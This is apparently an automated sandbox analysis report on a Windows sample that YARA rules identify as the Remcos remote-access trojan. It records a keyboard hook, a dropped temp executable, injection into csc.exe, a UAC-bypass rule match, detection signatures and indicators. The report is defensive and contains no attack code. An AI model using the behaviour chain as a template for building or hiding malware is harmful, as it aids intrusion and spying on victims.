                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.231.203.105:443 -> 192.168.2.5:49743 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\yjfesx.exe
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR

                      System Summary

                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, CentralIterator.csLarge array initialization: IterateAdaptableIterator: array initializer size 543744
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe File dump: ElectronArtsCLI.exe.0.dr 979567344
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exe File dump: HardDiskSentinelBin.exe.5.dr 979567142
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\yjfesx.exe CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00424A8C appears 166 times
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 004046E0 appears 63 times
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00428B04 appears 70 times
                      Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                      Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
                      Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                      Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
                      Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilename vs 3XSXmrEOw7.exe
                      Source: 3XSXmrEOw7.exe, 00000000.00000002.2354129676.0000000002736000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
                      Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
                      Source: 3XSXmrEOw7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, CentralIterator.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, DetachedCalc.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, UuINIkdXDBG5e46ex3q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, hIKm5xdfOG6UqF42bjx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00411010 GetLastError,FormatMessageA,LocalFree,0_2_00411010
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F650 GetModuleHandleA,GetProcAddress,SetLastError,SetLastError,SetLastError,GetDiskFreeSpaceA,0_2_0040F650
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F900 CoInitialize,CoCreateInstance,MultiByteToWideChar,0_2_0040F900
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004013D0 LoadResource,LockResource,SizeofResource,0_2_004013D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yjfesx.exe
                      Source: Yara matchFile source: 5.2.yjfesx.exe.13590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.csc.exe.840bf08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.csc.exe.83c60e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.csc.exe.8433f28.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2829283806.0000000013590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: 3XSXmrEOw7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 3XSXmrEOw7.exeReversingLabs: Detection: 28%
                      Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - Rpertoire par dfaut *Installation avance - Choix du rpertoireInternet Explorer %s est actuellemen
                      Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - R
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile read: C:\Users\user\Desktop\3XSXmrEOw7.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\3XSXmrEOw7.exe "C:\Users\user\Desktop\3XSXmrEOw7.exe"
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\yjfesx.exe C:\Users\user\AppData\Local\Temp\yjfesx.exe
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeProcess created: C:\Users\user\AppData\Local\Temp\yjfesx.exe "C:\Users\user\AppData\Local\Temp\yjfesx.exe"
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: aclayers.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: crowdstrikeceoisextragay.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
